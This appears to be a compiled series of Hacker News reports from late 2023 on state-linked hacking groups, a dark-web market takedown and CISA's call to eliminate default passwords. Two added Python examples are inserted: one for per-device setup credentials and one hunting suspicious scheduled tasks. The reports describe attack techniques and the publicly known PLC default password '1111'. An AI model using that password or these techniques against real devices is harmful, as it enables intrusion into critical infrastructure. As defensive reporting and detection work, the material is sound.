German Authorities Dismantle Dark Web Hub 'Kingdom Market' in Global Operation
23.12.23 BigBrothers The Hacker News
German law enforcement has announced the disruption of a dark web platform called Kingdom Market that specialized in the sales of narcotics and malware to "tens of thousands of users."
The exercise, which involved collaboration from authorities from the U.S., Switzerland, Moldova, and Ukraine, began on December 16, 2023, the Federal Criminal Police Office (BKA) said.
Kingdom Market is said to have been accessible over the TOR and Invisible Internet Project (I2P) anonymization networks since at least March 2021, trafficking in illegal narcotics as well as advertising malware, criminal services, and forged documents.
As many as 42,000 products have been sold via several hundred seller accounts on the English language platform prior to its takedown, with 3,600 of them originating from Germany.
Transactions on the Kingdom Market were facilitated through cryptocurrency payments in the form of Bitcoin, Litecoin, Monero, and Zcash, with the website operators receiving a 3% commission for processing the sales of the illicit goods.
"The operators of 'Kingdom Market' are suspected of commercially operating a criminal trading platform on the Internet and of illicit trafficking in narcotics," the BKA said, adding an investigation into the seized server infrastructure is ongoing.
In addition to the seizure, one person connected to the running of Kingdom Market has been charged in the U.S. with identity theft and money laundering. Alan Bill, who also goes by the aliases Vend0r and KingdomOfficial, has been described as a Slovakian national.
The development comes days after another coordinated law enforcement effort saw the dismantling of the BlackCat ransomware's dark web infrastructure, prompting the group to respond to the seizure of its data leak site by wresting control of the page, claiming they had "unseized" it.
Iranian Hackers Using MuddyC2Go in Telecom Espionage Attacks Across Africa
19.12.23 BigBrothers The Hacker News
The Iranian nation-state actor known as MuddyWater has leveraged a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan, and Tanzania.
The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix.
Active since at least 2017, MuddyWater is assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS), primarily singling out entities in the Middle East.
The cyber espionage group's use of MuddyC2Go was first highlighted by Deep Instinct last month, describing it as a Golang-based replacement for PhonyC2, itself a successor to MuddyC3. However, there is evidence to suggest that it may have been employed as early as 2020.
While the full extent of MuddyC2Go's capabilities is not yet known, the executable comes fitted with a PowerShell script that automatically connects to Seedworm's C2 server, thereby giving the attackers remote access to a victim system and obviating the need for manual execution by an operator.
The latest set of intrusions, which took place in November 2023, have also been found to rely on SimpleHelp and Venom Proxy, alongside a custom keylogger and other publicly available tools.
Attack chains mounted by the group have a track record of weaponizing phishing emails and known vulnerabilities in unpatched applications for initial access, followed by conducting reconnaissance, lateral movement, and data collection.
In the attacks documented by Symantec targeting an unnamed telecommunications organization, the MuddyC2Go launcher was executed to establish contact with an actor-controlled server, while also deploying legitimate remote access software like AnyDesk and SimpleHelp.
The entity is said to have been previously compromised by the adversary earlier in 2023 in which SimpleHelp was used to launch PowerShell, deliver proxy software, and also install the JumpCloud remote access tool.
"In another telecommunications and media company targeted by the attackers, multiple incidents of SimpleHelp were used to connect to known Seedworm infrastructure," Symantec noted. "A custom build of the Venom Proxy hacktool was also executed on this network, as well as the new custom keylogger used by the attackers in this activity."
By utilizing a combination of bespoke, living-off-the-land, and publicly available tools in its attack chains, the group aims to evade detection for as long as possible while meeting its strategic objectives, the company said.
"The group continues to innovate and develop its toolset when required in order to keep its activity under the radar," Symantec concluded. "The group still makes heavy use of PowerShell and PowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on their networks."
The development comes as an Israel-linked group called Gonjeshke Darande (meaning "Predatory Sparrow" in Persian) claimed responsibility for a cyber attack that disrupted a "majority of the gas pumps throughout Iran" in response to the "aggression of the Islamic Republic and its proxies in the region."
The group, which reemerged in October 2023 after going quiet for nearly a year, is believed to be linked to the Israeli Military Intelligence Directorate, having conducted destructive attacks in Iran, including steel facilities, petrol stations, and rail networks in the country.
CISA Urges Manufacturers to Eliminate Default Passwords to Thwart Cyber Threats
19.12.23 BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging manufacturers to get rid of default passwords on internet-exposed systems altogether, citing severe risks that could be exploited by malicious actors to gain initial access to, and move laterally within, organizations.
In an alert published last week, the agency called out Iranian threat actors affiliated with the Islamic Revolutionary Guard Corps (IRGC) for exploiting operational technology devices with default passwords to gain access to critical infrastructure systems in the U.S.
Default passwords refer to factory default software configurations for embedded systems, devices, and appliances that are typically publicly documented and identical among all systems within a vendor's product line.
As a result, threat actors could scan for internet-exposed endpoints using tools like Shodan and attempt to breach them through default passwords, often gaining root or administrative privileges to perform post-exploitation actions depending on the type of the system.
"Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary," MITRE notes.
Earlier this month, CISA revealed that IRGC-affiliated cyber actors using the persona Cyber Av3ngers are actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs) that are publicly exposed to the internet through the use of default passwords ("1111").
"In these attacks, the default password was widely known and publicized on open forums where threat actors are known to mine intelligence for use in breaching U.S. systems," the agency added.
As mitigation measures, manufacturers are being urged to follow secure by design principles and provide unique setup passwords with the product, or alternatively disable such passwords after a preset time period and require users to enable phishing-resistant multi-factor authentication (MFA) methods.
The agency further advised vendors to conduct field tests to determine how their customers are deploying the products within their environments and if they involve the use of any unsafe mechanisms.
"Analysis of these field tests will help bridge the gap between developer expectations and actual customer usage of the product," CISA noted in its guidance.
"It will also help identify ways to build the product so customers will be most likely to securely use it—manufacturers should ensure that the easiest route is the secure one."
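As an added illustration of the secure-by-design alternative CISA describes (unique setup password per unit, disabled after a preset period, replaced at first login), this is example code written here, not CISA's guidance text or any vendor's firmware; the 24-hour window, the PBKDF2 parameters and the 12-character minimum are assumptions.

```python
"""Added example: per-device setup credentials instead of a shared product-line default."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import Optional, Tuple

# Assumed preset period: an unused setup credential is disabled after 24 hours.
SETUP_PASSWORD_TTL = timedelta(hours=24)
PBKDF2_ROUNDS = 100_000  # assumed work factor


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


@dataclass
class Device:
    serial: str
    salt: bytes = field(default_factory=lambda: secrets.token_bytes(16))
    password_hash: Optional[bytes] = None
    setup_expires_at: Optional[datetime] = None  # None once the owner has set a password
    must_change: bool = True                     # forces replacement of the setup credential


def provision(serial: str, now: datetime) -> Tuple[Device, str]:
    """Factory step: every unit gets its own random setup password. The clear
    text goes on the unit's label only; the device stores a salted hash."""
    setup_password = secrets.token_urlsafe(12)
    dev = Device(serial=serial)
    dev.password_hash = _hash(setup_password, dev.salt)
    dev.setup_expires_at = now + SETUP_PASSWORD_TTL
    return dev, setup_password


def login(dev: Device, password: str, now: datetime) -> str:
    """Returns "ok", "change_required" or "denied"."""
    if dev.password_hash is None:
        return "denied"
    # A setup credential that was never replaced stops working after the TTL, so a
    # unit left internet-exposed with its label password is not open indefinitely.
    if dev.setup_expires_at is not None and now >= dev.setup_expires_at:
        return "denied"
    if not hmac.compare_digest(_hash(password, dev.salt), dev.password_hash):
        return "denied"
    return "change_required" if dev.must_change else "ok"


def set_password(dev: Device, old: str, new: str, now: datetime) -> bool:
    """First-login step: replace the setup credential; rejects trivial values."""
    if login(dev, old, now) == "denied":
        return False
    if len(new) < 12 or new == old or new.isdigit():
        return False
    dev.salt = secrets.token_bytes(16)
    dev.password_hash = _hash(new, dev.salt)
    dev.setup_expires_at = None
    dev.must_change = False
    return True


def demo() -> dict:
    """Walks two units through provisioning and returns the observed outcomes."""
    t0 = datetime(2023, 12, 19, tzinfo=timezone.utc)
    unit_a, label_a = provision("SN-0001", t0)
    unit_b, label_b = provision("SN-0002", t0)
    return {
        "labels_differ": label_a != label_b,        # no "1111" shared across the product line
        "guess_1111": login(unit_a, "1111", t0),    # the old product-line default is rejected
        "first_login": login(unit_a, label_a, t0),  # label password works, but must be changed
        "changed": set_password(unit_a, label_a, "Plc-Owner-Pass-2023", t0),
        "after_change": login(unit_a, "Plc-Owner-Pass-2023", t0 + timedelta(days=30)),
        "stale_setup": login(unit_b, label_b, t0 + timedelta(hours=25)),  # unused label expired
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```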
The disclosure comes as the Israel National Cyber Directorate (INCD) attributed a Lebanese threat actor with connections to the Iranian Ministry of Intelligence for orchestrating cyber attacks targeting critical infrastructure in the country amidst its ongoing war with Hamas since October 2023.
The attacks, which involve the exploitation of known security flaws (e.g., CVE-2018-13379) to obtain sensitive information and deploy destructive malware, have been tied to an attack group named Plaid Rain (formerly Polonium).
The development also follows the release of a new advisory from CISA that outlines security countermeasures for healthcare and critical infrastructure entities to fortify their networks against potential malicious activity and reduce the likelihood of domain compromise:
Enforce strong passwords and phishing-resistant MFA
Ensure that only ports, protocols, and services with validated business needs are running on each system
Configure Service accounts with only the permissions necessary for the services they operate
Change all default passwords for applications, operating systems, routers, firewalls, wireless access points, and other systems
Discontinue reuse or sharing of administrative credentials among user/administrative accounts
Mandate consistent patch management
Implement network segregation controls
Evaluate the use of unsupported hardware and software and discontinue where possible
Encrypt personally identifiable information (PII) and other sensitive data
On a related note, the U.S. National Security Agency (NSA), Office of the Director of National Intelligence (ODNI), and CISA published a list of recommended practices that organizations can adopt in order to harden the software supply chain and improve the safety of their open-source software management processes.
"Organizations that do not follow a consistent and secure-by-design management practice for the open-source software they utilize are more likely to become vulnerable to known exploits in open-source packages and encounter more difficulty when reacting to an incident," said Aeva Black, open-source software security lead at CISA.
New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities
14.12.23 BigBrothers The Hacker News
A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi.
The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it's implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor.
"Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war," security researcher Aleksandar Milenkoski said in a report shared with The Hacker News.
Gaza Cyber Gang, believed to be active since at least 2012, has a history of striking targets throughout the Middle East, particularly Israel and Palestine, often leveraging spear-phishing as a method of initial access.
Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpStage, Spark, Pierogi, PoisonIvy, and XtremeRAT among others.
The threat actor is assessed to be a composite of several sub-groups that share overlapping victimology footprints and malware, such as Molerats, Arid Viper, and a cluster referred to as Operation Parliament by Kaspersky.
In recent months, the adversarial collective has been linked to a series of attacks that deliver improvised variants of its Micropsia and Arid Gopher implants as well as a new initial access downloader dubbed IronWind.
The latest set of intrusions mounted by Gaza Cyber Gang has been found to leverage Pierogi++ and Micropsia. The first recorded use of Pierogi++ goes back to late 2022.
Attack chains are characterized by the use of decoy documents written in Arabic or English and pertaining to matters of interest to Palestinians to deliver the backdoors.
Cybereason, which shed light on Pierogi in February 2020, described it as an implant that allows attackers to spy on targeted victims and that the "commands used to communicate with the [command-and-control] servers and other strings in the binary are written in Ukrainian."
"The backdoor may have been obtained in underground communities rather than home-grown," it assessed at the time.
Both Pierogi and Pierogi++ are equipped to take screenshots, execute commands, and download attacker-provided files. Another notable aspect is that the updated artifacts no longer feature any Ukrainian strings in the code.
SentinelOne's investigation into Gaza Cyber Gang's operations has also yielded tactical connections between two disparate campaigns referred to as Big Bang and Operation Bearded Barbie, in addition to reinforcing ties between the threat actor and WIRTE, as previously disclosed by Kaspersky in November 2021.
The sustained focus on Palestine notwithstanding, the discovery of Pierogi++ underscores that the group continues to refine and retool its malware to ensure successful compromise of targets and to maintain persistent access to their networks.
"The observed overlaps in targeting and malware similarities across the Gaza Cybergang sub-groups after 2018 suggests that the group has likely been undergoing a consolidation process," Milenkoski said.
"This possibly includes the formation of an internal malware development and maintenance hub and/or streamlining supply from external vendors."
Iranian State-Sponsored OilRig Group Deploys 3 New Malware Downloaders
14.12.23 BigBrothers The Hacker News
The Iranian state-sponsored threat actor known as OilRig deployed three different malware downloaders throughout 2022 to maintain persistent access to victim organizations located in Israel.
The three new downloaders have been named ODAgent, OilCheck, and OilBooster by Slovak cybersecurity company ESET. The attacks also involved the use of an updated version of a known OilRig downloader dubbed SampleCheck5000 (or SC5k).
"These lightweight downloaders [...] are notable for using one of several legitimate cloud service APIs for [command-and-control] communication and data exfiltration: the Microsoft Graph OneDrive or Outlook APIs, and the Microsoft Office Exchange Web Services (EWS) API," security researchers Zuzana Hromcová and Adam Burgher said in a report shared with The Hacker News.
By using well-known cloud service providers for command-and-control communication, the group aims to blend in with legitimate network traffic and conceal its attack infrastructure.
Some of the targets of the campaign include an organization in the healthcare sector, a manufacturing company, and a local governmental organization, among others. All the victims are said to have been previously targeted by the threat actor.
The exact initial access vector used to compromise the targets is currently unclear and it's not known if the attackers managed to retain their foothold in the networks so as to deploy these downloaders at various points of time in 2022.
OilRig, also known as APT34, Crambus, Cobalt Gypsy, Hazel Sandstorm (formerly EUROPIUM), and Helix Kitten, is an Iranian cyber espionage group that's known to be active since at least 2014, using a wide range of malware at its disposal to target entities in the Middle East.
This year alone, the hacking crew has been observed leveraging novel malware like MrPerfectionManager, PowerExchange, Solar, Mango, and Menorah.
ODAgent, first detected in February 2022, is a C#/.NET downloader that utilizes Microsoft OneDrive API for command-and-control (C2) communications, allowing the threat actor to download and execute payloads, and exfiltrate staged files.
SampleCheck5000, on the other hand, is designed to interact with a shared Microsoft Exchange mail account to download and execute additional OilRig tools using the Office Exchange Web Services (EWS) API.
OilBooster, in the same way as ODAgent, uses Microsoft OneDrive API for C2, whereas OilCheck adopts the same technique as SampleCheck5000 to extract commands embedded in draft messages. But instead of using the EWS API, it leverages Microsoft Graph API for network communications.
OilBooster is also similar to OilCheck in that it employs the Microsoft Graph API to connect to a Microsoft Office 365 account. What's different this time around is that the API is used to interact with an actor-controlled OneDrive account as opposed to an Outlook account in order to fetch commands and payloads from victim-specific folders.
These tools also share similarities with MrPerfectionManager and PowerExchange backdoors when it comes to using email-based C2 protocols to exfiltrate data, although in the case of the latter, the victimized organization's Exchange Server is used to send messages to the attacker's email account.
"In all cases, the downloaders use a shared (email or cloud storage) OilRig-operated account to exchange messages with the OilRig operators; the same account is typically shared by multiple victims," the researchers explained.
"The downloaders access this account to download commands and additional payloads staged by the operators, and to upload command output and staged files."
Major Cyber Attack Paralyzes Kyivstar - Ukraine's Largest Telecom Operator
13.12.23 BigBrothers The Hacker News
Ukraine's biggest telecom operator Kyivstar has become the victim of a "powerful hacker attack," disrupting customer access to mobile and internet services.
"The cyberattack on Ukraine's #Kyivstar telecoms operator has impacted all regions of the country with high impact to the capital, metrics show, with knock-on impacts reported to air raid alert network and banking sector as work continues to restore connectivity," NetBlocks said in a series of posts on X (formerly Twitter).
Kyivstar, which is owned by Dutch-domiciled multinational telecommunication services company VEON, serves nearly 25 million mobile subscribers and more than 1 million home internet customers.
The company said the attack was "a result of" the war with Russia and that it has notified law enforcement and special state services. While Kyivstar is working to restore the services, the internet watchdog noted that the telco is largely offline.
That said, Kyivstar has yet to provide details about the nature of the attacks and what caused the shutdown. There is no evidence that the personal data of subscribers has been compromised in the incident.
"After stabilizing the network, all subscribers and corporate clients who as a result of a hacking attack could not use the services of the company, will definitely receive compensation," Kyivstar said in an update posted on Facebook.
Source: NetBlocks
It's also urging users to be on the lookout for scams aiming to trick users into sharing their personal details and that "news about compensation and the timing of the network restoration will come exclusively from the company's official pages."
The pro-Russia hacktivist group KillNet claimed responsibility for the attack on Telegram, but did not offer any additional evidence to back its claims.
KillNet is coming off a few chaotic weeks of its own after the Russia-based Gazeta.ru unmasked the real-world identity of its leader — who goes by the online alias KillMilk — as Nikolai Serafimov, a 30-year-old Russian citizen.
KillMilk has since announced his retirement, appointing in his place a new head named "Deanon Club," who has claimed that "there will be a large-scale recruitment for the KillNet team, on all fronts" with the goal of striking government financial facilities, encryption firms, and the gambling sector.
The development also comes as the Defence Intelligence of Ukraine (GUR) revealed that it hacked into Russia's Federal Taxation Service (FNS) servers and wiped all its data. Office.ed-it.ru, a Russian IT company that served as a database for the FNS, was also reportedly affected by the attack.
"During the special operation, military intelligence officers managed to infiltrate one of the well-protected key central servers of the Federal Tax Service (FTS of the Russian Federation), and then more than 2300 of its regional servers throughout Russia, as well as on the territory of the temporarily occupied Crimea," the agency said.
Last month, GUR announced that it was behind a cyber assault against the Russian government's Federal Air Transport Agency (FATA), which is also known as Rosaviatsia. The attack allowed it to access “a large volume of confidential documents,” including a list of daily reports spanning more than a year and a half, it said.
However, Anton Gorelkin, a Russian politician and lawmaker, said in a message on Telegram that the attack on FNS is fiction, adding it is an attempt on part of the Ukrainian government to "respond to their problems with Kyivstar."
Russia's AI-Powered Disinformation Operation Targeting Ukraine, U.S., and Germany
6.12.23 BigBrothers The Hacker News
The Russia-linked influence operation called Doppelganger has targeted Ukrainian, U.S., and German audiences through a combination of inauthentic news sites and social media accounts.
These campaigns are designed to amplify content designed to undermine Ukraine as well as propagate anti-LGBTQ+ sentiment, U.S. military competence, and Germany's economic and social issues, according to a new report shared with The Hacker News.
Doppelganger, described by Meta as the "largest and the most aggressively-persistent Russian-origin operation," is a pro-Russian network known for spreading anti-Ukrainian propaganda. Active since at least February 2022, it has been linked to two companies named Structura National Technologies and Social Design Agency.
Activities associated with the influence operation are known to leverage manufactured websites as well as those impersonating authentic media – a technique called brandjacking – to disseminate adversarial narratives.
The latest campaigns are also characterized by the use of advanced obfuscation techniques, including "manipulating social media thumbnails and strategic first and second-stage website redirects to evade detection, and the likely use of generative artificial intelligence (AI) to create inauthentic news articles," the cybersecurity firm said.
The findings demonstrate Doppelgänger's evolving tactics and throw light on the use of AI for information warfare and to produce scalable influence content.
The campaign targeting Ukraine is said to consist of more than 800 social media accounts, in addition to banking on first and second-stage domains to conceal the true destination. Some of these links also use the Keitaro Traffic Distribution System (TDS) to assess the overall success and effectiveness of the campaign.
One of the notable aspects of the U.S. and German campaigns is the use of inauthentic media outlets such as Election Watch, MyPride, Warfare Insider, Besuchszweck, Grenzezank, and Haüyne Scherben that publish malign content as original news and opinion outlets.
"Doppelgänger exemplifies the enduring, scalable, and adaptable nature of Russian information warfare, demonstrating strategic patience aimed at gradually shifting public opinion and behavior," Recorded Future said.
It's worth pointing out that Meta, in its quarterly Adversarial Threat Report published last week, said it also found a new cluster of websites linked to Doppelganger that are geared towards U.S. and European political affairs, such as migration and border security.
"Their latest web content appears to have been copy-pasted from mainstream U.S. news outlets and altered to question U.S. democracy and promote conspiratorial themes," Meta said, highlighting Election Watch as one of the U.S.-focused sites.
"Soon after the Hamas terrorist attack in Israel [in October 2023], we saw these websites begin posting about the crisis in the Middle East as a proof of American decline; and at least one website claimed Ukraine supplied Hamas with weapons."
Meta also said it took steps to disrupt three separate covert influence operations – two from China and one from Russia – during the third quarter of 2023 that leveraged fictitious personas and media brands to target audiences in India and the U.S., and share content about Russia's invasion of Ukraine.
It, however, noted that proactive threat sharing by the federal government in the U.S. related to foreign election interference has been paused since July 2023, cutting off a key source of information that could be valuable to disrupt malicious foreign campaigns by sophisticated threat actors.
New Threat Actor 'AeroBlade' Emerges in Espionage Attack on U.S. Aerospace
5.12.23 BigBrothers The Hacker News
A previously undocumented threat actor has been linked to a cyber attack targeting an aerospace organization in the U.S. as part of what's suspected to be a cyber espionage mission.
The BlackBerry Threat Research and Intelligence team is tracking the activity cluster as AeroBlade. Its origin is currently unknown and it's not clear if the attack was successful.
"The actor used spear-phishing as a delivery mechanism: A weaponized document, sent as an email attachment, contains an embedded remote template injection technique and a malicious VBA macro code, to deliver the next stage to the final payload execution," the company said in an analysis published last week.
The network infrastructure used for the attack is said to have gone live around September 2022, with the offensive phase of the intrusion occurring nearly a year later in July 2023, but not before the adversary took steps to improvise its toolset to make it more stealthy in the intervening time period.
The initial attack, which took place in September 2022, commenced with a phishing email bearing a Microsoft Word attachment that, when opened, used a technique called remote template injection to retrieve a next-stage payload that's executed after the victim enables macros.
The attack chain ultimately led to the deployment of a dynamic-link library (DLL) that functions as a reverse shell, connecting to a hard-coded command-and-control (C2) server and transmitting system information to the attackers.
The information gathering capabilities also include enumerating the complete list of directories on the infected host, indicating that this could be a reconnaissance effort carried out to see if the machine hosts any valuable data and aid its operators in strategizing their next steps.
"Reverse shells allow attackers to open ports to the target machines, forcing communication and enabling a complete takeover of the device," Dmitry Bestuzhev, senior director of cyber threat intelligence at BlackBerry, said. "It is therefore a severe security threat."
The heavily obfuscated DLL also comes fitted with anti-analysis and anti-disassembly techniques to make it challenging to detect and take apart, while also skipping execution in sandboxed environments. Persistence is accomplished by means of the Windows Task Scheduler, in which a task named "WinUpdate2" is created to run every day at 10:10 a.m.
"During the time that elapsed between the two campaigns we observed, the threat actor put considerable effort into developing additional resources to ensure they could secure access to the sought-after information, and that they could exfiltrate it successfully," Bestuzhev said.
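A defender-side hunt for the persistence mechanism described above, as an added example that is not part of BlackBerry's report: it reads Windows Security Event ID 4698 ("A scheduled task was created") records, parses the task XML, and flags update-themed task names registered outside the Microsoft\Windows folder, DLLs loaded via rundll32, and actions launched from user-writable paths. The event records are constructed samples; the executable paths and the "svc.dll" name are assumptions, only the task name and the daily 10:10 schedule come from the page.

```python
"""Added example: triaging scheduled-task creation events for AeroBlade-style persistence."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
UPDATE_LOOKALIKE = re.compile(r"(win|windows|ms|microsoft)\s*-?\s*upd", re.I)
USER_WRITABLE = re.compile(r"(\\Users\\[^\\]+\\AppData\\|\\ProgramData\\|\\Temp\\)", re.I)


def _text(root, path: str) -> str:
    node = root.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def describe_schedule(root) -> str:
    """Summarises the first calendar trigger, e.g. 'daily at 10:10'."""
    trig = root.find("t:Triggers/t:CalendarTrigger", NS)
    if trig is None:
        return "non-calendar or no trigger"
    start = _text(trig, "t:StartBoundary")
    clock = start.split("T")[1][:5] if "T" in start else "?"
    if trig.find("t:ScheduleByDay", NS) is not None:
        return f"daily at {clock}"
    return f"calendar trigger starting {start}"


def triage_task(task_name: str, task_xml: str) -> Dict:
    """Parses one task definition and returns the reasons (if any) it looks suspicious."""
    root = ET.fromstring(task_xml)
    command = _text(root, "t:Actions/t:Exec/t:Command")
    args = _text(root, "t:Actions/t:Exec/t:Arguments")
    flags: List[str] = []
    if UPDATE_LOOKALIKE.search(task_name) and not task_name.lower().startswith("\\microsoft\\windows\\"):
        flags.append("update-themed task name registered outside \\Microsoft\\Windows\\")
    if command.lower().rsplit("\\", 1)[-1] == "rundll32.exe":
        flags.append("action loads a DLL via rundll32.exe")
    if USER_WRITABLE.search(command + " " + args):
        flags.append("action runs from a user-writable directory")
    return {"task": task_name, "schedule": describe_schedule(root),
            "command": f"{command} {args}".strip(), "flags": flags}


def hunt(events: List[Dict]) -> List[Dict]:
    """Returns triage results for every 4698 event that raised at least one flag."""
    results = (triage_task(e["TaskName"], e["TaskContent"]) for e in events if e["EventID"] == 4698)
    return [r for r in results if r["flags"]]


def _task_xml(start: str, command: str, arguments: str) -> str:
    # Minimal Task Scheduler XML in the real schema, used to build the constructed samples.
    return (f'<Task version="1.2" xmlns="{NS["t"]}"><Triggers><CalendarTrigger>'
            f"<StartBoundary>{start}</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval>"
            f"</ScheduleByDay></CalendarTrigger></Triggers><Actions><Exec><Command>{command}"
            f"</Command><Arguments>{arguments}</Arguments></Exec></Actions></Task>")


# Constructed sample events (field names follow Event ID 4698; values are assumed).
SAMPLE_EVENTS = [
    {"EventID": 4698, "SubjectUserName": "alice", "TaskName": "\\WinUpdate2",
     "TaskContent": _task_xml("2023-07-10T10:10:00", "rundll32.exe",
                              r"C:\Users\alice\AppData\Roaming\svc.dll,Start")},
    {"EventID": 4698, "SubjectUserName": "SYSTEM",
     "TaskName": "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start",
     "TaskContent": _task_xml("2023-07-10T03:00:00", r"%windir%\system32\sc.exe", "start wuauserv")},
    {"EventID": 4698, "SubjectUserName": "bob", "TaskName": "\\Nightly Backup",
     "TaskContent": _task_xml("2023-07-10T23:30:00", r"C:\Program Files\Backup\backup.exe", "/full")},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["task"], "|", hit["schedule"], "|", hit["command"])
        for flag in hit["flags"]:
            print("   -", flag)
```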
U.S. Treasury Sanctions North Korean Kimsuky Hackers and 8 Foreign-Based Agents
1.12.23 BigBrothers The Hacker News
The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) on Thursday sanctioned the North Korea-linked adversarial collective known as Kimsuky as well as eight foreign-based agents who are alleged to have facilitated sanctions evasion.
The agents, the Treasury said, helped in "revenue generation and missile-related technology procurement that support the DPRK's weapons of mass destruction (WMD) programs."
The sanctions against Kimsuky, which have been levied for gathering intelligence to support the regime's strategic objectives, come more than four years after the OFAC imposed similar measures against the Lazarus Group and its offshoots Andariel and BlueNoroff in September 2019.
The actions are in response to North Korea's launch of a military reconnaissance satellite late last month, the Treasury added. They also arrive a day after a virtual currency mixer service called Sinbad was sanctioned for processing stolen assets linked to hacks perpetrated by the Lazarus Group.
Kimsuky – also called APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima – is a prolific cyber espionage crew that primarily targets governments, nuclear organizations, and foreign relations entities to collect intelligence that helps further North Korea's interests.
"The group combines moderately sophisticated technical capabilities with aggressive social engineering tactics, especially against South Korean and U.S.-based government organizations, academics, and think tanks focused on Korean peninsula geopolitical issues," Google-owned Mandiant noted in October 2023.
Like the Lazarus Group, it's also an element within the Reconnaissance General Bureau (RGB), which is North Korea's primary foreign intelligence service that's responsible for intelligence collection operations. It's known to be active since at least 2012.
"Kimsuky employs social engineering to collect intelligence on geopolitical events, foreign policy strategies, and diplomatic efforts affecting its interests by gaining illicit access to the private documents, research, and communications of their targets," the Treasury said.
The agency also identified Kang Kyong Il, Ri Sung Il, and Kang Phyong Guk for acting as weapons sales representatives; So Myong, Choe Un Hyok, and Jang Myong Chol for engaging in illicit financial transfers to procure material for North Korea's missile programs; and Choe Song Chol and Im Song Sun for running front companies involved in generating revenue by exporting skilled workers.
"The geographic breakdown of North Korean threat groups' targeting in the cryptocurrency industry [follows a multi-pronged approach], where Kimsuky has been seen targeting the cryptocurrency industry in South Korea, and Lazarus Group has a more global presence in their cryptocurrency targeting operations," Recorded Future said in a new report published this week.
Hamas-Linked Cyberattacks Using Rust-Powered SysJoker Backdoor Against Israel
25.11.23 BigBrothers The Hacker News
Cybersecurity researchers have shed light on a Rust version of a cross-platform backdoor called SysJoker, which is assessed to have been used by a Hamas-affiliated threat actor to target Israel amid the ongoing war in the region.
"Among the most prominent changes is the shift to Rust language, which indicates the malware code was entirely rewritten, while still maintaining similar functionalities," Check Point said in a Wednesday analysis. "In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command-and-control server) URLs."
SysJoker was publicly documented by Intezer in January 2022, describing it as a backdoor capable of gathering system information and establishing contact with an attacker-controlled server by accessing a text file hosted on Google Drive that contains a hard-coded URL.
"Being cross-platform allows the malware authors to gain advantage of wide infection on all major platforms," VMware said last year. "SysJoker has the ability to execute commands remotely as well as download and execute new malware on victim machines."
The discovery of a Rust variant of SysJoker points to an evolution of the cross-platform threat, with the implant employing random sleep intervals at various stages of its execution, likely in an effort to evade sandboxes.
One noteworthy shift is the use of OneDrive to retrieve the encrypted and encoded C2 server address, which is subsequently parsed to extract the IP address and port to be used.
"Using OneDrive allows the attackers to easily change the C2 address, which enables them to stay ahead of different reputation-based services," Check Point said. "This behavior remains consistent across different versions of SysJoker."
After establishing a connection with the server, the artifact awaits additional payloads, which are then executed on the compromised host.
The cybersecurity company said it also discovered two never-before-seen SysJoker samples designed for Windows that are significantly more complex, one of which utilizes a multi-stage execution process to launch the malware.
SysJoker has not yet been formally attributed to any threat actor or group. But newly gathered evidence shows overlaps between the backdoor and malware samples used in connection with Operation Electric Powder, which refers to a targeted campaign against Israeli organizations between April 2016 and February 2017.
This activity was linked by McAfee to a Hamas-affiliated threat actor known as Molerats (aka Extreme Jackal, Gaza Cyber Gang, and TA402).
"Both campaigns used API-themed URLs and implemented script commands in a similar fashion," Check Point noted, raising the possibility that "the same actor is responsible for both attacks, despite the large time gap between the operations."
Mustang Panda Hackers Target Philippines Government Amid South China Sea Tensions
21.11.23 BigBrothers The Hacker News
The China-linked Mustang Panda actor has been linked to a cyber attack targeting a Philippines government entity amid rising tensions between the two countries over the disputed South China Sea.
Palo Alto Networks Unit 42 attributed three campaigns in August 2023 to the adversarial collective, primarily singling out organizations in the South Pacific.
"The campaigns leveraged legitimate software including Solid PDF Creator and SmadavProtect (an Indonesian-based antivirus solution) to sideload malicious files," the company said.
"Threat authors also creatively configured the malware to impersonate legitimate Microsoft traffic for command and control (C2) connections."
Mustang Panda, also tracked under the names Bronze President, Camaro Dragon, Earth Preta, RedDelta, and Stately Taurus, is assessed to be a Chinese advanced persistent threat (APT) active since at least 2012, orchestrating cyber espionage campaigns targeting non-governmental organizations (NGOs) and government bodies across North America, Europe, and Asia.
In late September 2023, Unit 42 also implicated the threat actor in attacks aimed at an unnamed Southeast Asian government to distribute a variant of a backdoor called TONESHELL.
The latest campaigns leverage spear-phishing emails to deliver a malicious ZIP archive file that contains a rogue dynamic-link library (DLL) that's launched using a technique called DLL side-loading. The DLL subsequently establishes contact with a remote server.
It's assessed that the Philippines government entity was likely compromised over a five-day period between August 10 and 15, 2023.
